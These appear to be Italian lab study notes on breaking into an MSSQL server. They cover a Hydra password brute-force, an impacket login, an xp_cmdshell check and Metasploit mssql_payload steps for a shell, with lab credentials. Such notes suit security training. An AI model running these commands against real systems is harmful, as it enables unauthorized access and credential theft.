tags : mssql Connessione_MSSQL
Per connetterci a MSSQL possiamo utilizzare un programma presente nella cartella impaket, ma prima dobbiamo trovare le credenziali, il nome dell’utente in genere si può trovare tramite nmap e si presenta in questo modo:
Dove il nome utente è SQL_srv, per la password possiamo provare a trovarla tramite Hydra tramite il seguente comando:
hydra -L user.txt -P /root/ADtools/rockyou.txt 10.10.1.30 mssql
Una volta trovate le credenziali possiamo utlizzare il seguente comando per connetterci:
python3 /root/impacket/examples/mssqlclient.py CEH.com/SQL_srv:[email protected] -port 1433
Una volta dentro puoi provare ad utilizzare il seguente comando per vedere se è presente xp_cmdshell:
SELECT name, CONVERT(INT, ISNULL(value, value_in_use)) AS IsConfigured FROM sys.configurations WHERE name='xp_cmdshell';
Nel caso fosse presente possiamo utlizzare metasploit per ottenere una shell ed ottenere i permessi di amministratore:
- msfconsole
- use exploit/windows/mssql/mssql_payload
- set RHOST 10.10.1.30
- set USERNAME SQL_srv
- set PASSWORD batman
- set DATABASE master
